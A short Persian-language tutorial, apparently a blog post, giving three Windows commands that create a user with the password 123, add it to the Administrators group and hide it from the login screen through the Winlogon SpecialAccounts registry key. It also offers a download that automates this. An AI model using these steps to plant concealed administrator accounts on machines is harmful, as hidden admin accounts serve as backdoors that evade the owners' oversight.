ابتدا cmd را به صورت Admin باز کنید و جلمه زیر را وارد کنید تا کاربری با نام SamiUx و رمز 123 ساخته شود.

net user SamiUx 123 /add

اکنون جلمه زیر را وارد کنید تا گروه کاربری آن مدیر بشود.

net localgroup Administrators SamiUx /add

برای مخفی سازی یوزر در منوی استارت ، صفحه لاگین ویندوز جلمه زیر را وارد کنید.

reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” /v SamiUx /t REG_DWORD /d 0 /f

توجه داشته باشید یورز ساخته شده در صفحه Local users and Group نمایش داده می شود.

فایلی رو واستون آماده کردم که بدون زحمت فقط یوزرنیم و پسورد رو بهش میدید و اینتر میزنید و خیلی سریع یوزر مخفی واستون ساخته میشه ...

دانلود فایل